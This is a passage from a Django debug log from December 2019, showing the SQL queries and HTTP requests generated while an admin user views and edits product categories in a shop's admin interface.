"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:17:15,692 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:17:15.689739+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 17, 15, 689739, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:17:15] "GET /shop/category/add/ HTTP/1.0" 200 7304 DEBUG 2019-12-07 13:17:15,997 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:15.983857+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 15, 983857, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:16,001 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:17:16] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:17:18,698 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:18.683881+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 18, 683881, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:18,702 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:17:18,707 utils 32196 139885061072640 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-07 13:17:18,709 utils 32196 139885061072640 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-07 13:17:18,718 utils 32196 139885061072640 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-07 13:17:18,883 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:17:18.880647+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 17, 18, 880647, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:17:18] "GET /shop/category/ HTTP/1.0" 200 6764 DEBUG 2019-12-07 13:17:19,181 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:19.166954+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 19, 166954, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:19,185 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:17:19] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:17:25,102 utils 32196 139885061072640 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:25.092294+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 25, 92294, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:25,105 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:17:25,108 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-07 13:17:25,160 utils 32196 139885061072640 (0.001) DECLARE "_django_curs_139885061072640_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:17:25,194 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:17:25.192560+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 17, 25, 192560, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:17:25] "GET /shop/category/1/change/ HTTP/1.0" 200 7297 DEBUG 2019-12-07 13:17:25,479 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:25.470761+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 25, 470761, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:25,482 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:17:25] "GET /jsi18n/ HTTP/1.0" 200 3223 [07/Dec/2019 13:17:44] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:17:45,614 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:45.600480+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 45, 600480, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:45,619 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:17:45,623 utils 32196 139885061072640 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-07 13:17:45,635 utils 32196 139885061072640 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."name" = 'Fire' AND NOT ("shop_category"."id" = 1)) LIMIT 1; args=('Fire', 1) DEBUG 2019-12-07 13:17:45,640 utils 32196 139885061072640 (0.001) UPDATE "shop_category" SET "name" = 'Fire', "parent_id" = NULL, "image" = 'categories/2019/12/07/collection2.png', "description" = '', "slug" = 'fire' WHERE "shop_category"."id" = 1; args=('Fire', 'categories/2019/12/07/collection2.png', '', 'fire', 1) DEBUG 2019-12-07 13:17:45,643 utils 32196 139885061072640 (0.002) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-07T13:17:45.641208+00:00'::timestamptz, 6, 8, '1', 'Fire', 2, '[{"changed": {"fields": ["image"]}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 7, 13, 17, 45, 641208, tzinfo=), 6, 8, '1', 'Fire', 2, '[{"changed": {"fields": ["image"]}}]') [07/Dec/2019 13:17:45] "POST /shop/category/1/change/ HTTP/1.0" 302 0 DEBUG 2019-12-07 13:17:45,909 utils 32196 139885061072640 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:45.893997+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 45, 893997, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:45,912 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:17:45,917 utils 32196 139885061072640 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-07 13:17:45,918 utils 32196 139885061072640 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-07 13:17:45,926 utils 32196 139885061072640 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-07 13:17:46,056 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:17:46.054629+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 17, 46, 54629, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:17:46] "GET /shop/category/ HTTP/1.0" 200 6940 DEBUG 2019-12-07 13:17:46,336 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:46.327274+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 46, 327274, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:46,338 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:17:46] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:17:48,525 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:48.514861+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 48, 514861, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:48,528 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:17:48,531 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 2; args=(2,) DEBUG 2019-12-07 13:17:48,584 utils 32196 139885061072640 (0.001) DECLARE "_django_curs_139885061072640_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:17:48,626 utils 32196 139885061072640 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:17:48.623053+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 17, 48, 623053, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:17:48] "GET /shop/category/2/change/ HTTP/1.0" 200 7318 DEBUG 2019-12-07 13:17:48,926 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:48.917446+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 48, 917446, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:48,929 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:17:48] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:17:53,334 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:53.325505+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 53, 325505, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:53,337 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:17:53,340 utils 32196 139885061072640 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-07 13:17:53,341 utils 32196 139885061072640 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-07 13:17:53,345 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-07 13:17:53,429 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:17:53.427327+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 17, 53, 427327, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:17:53] "GET /shop/category/ HTTP/1.0" 200 6764 DEBUG 2019-12-07 13:17:53,728 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:53.718983+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 53, 718983, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:53,731 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:17:53] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:18:04,749 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:18:04.739417+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 18, 4, 739417, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:18:04,752 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:18:04,808 utils 32196 139885061072640 (0.002) DECLARE "_django_curs_139885061072640_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:18:04,847 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:18:04.845404+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 18, 4, 845404, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:18:04] "GET /shop/category/add/ HTTP/1.0" 200 7078 DEBUG 2019-12-07 13:18:05,140 utils 32196 139885061072640 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:18:05.127847+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 18, 5, 127847, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:18:05,144 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:18:05] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:18:24,548 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:18:24.534354+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 18, 24, 534354, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:18:24,552 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:18:24,569 utils 32196 139885061072640 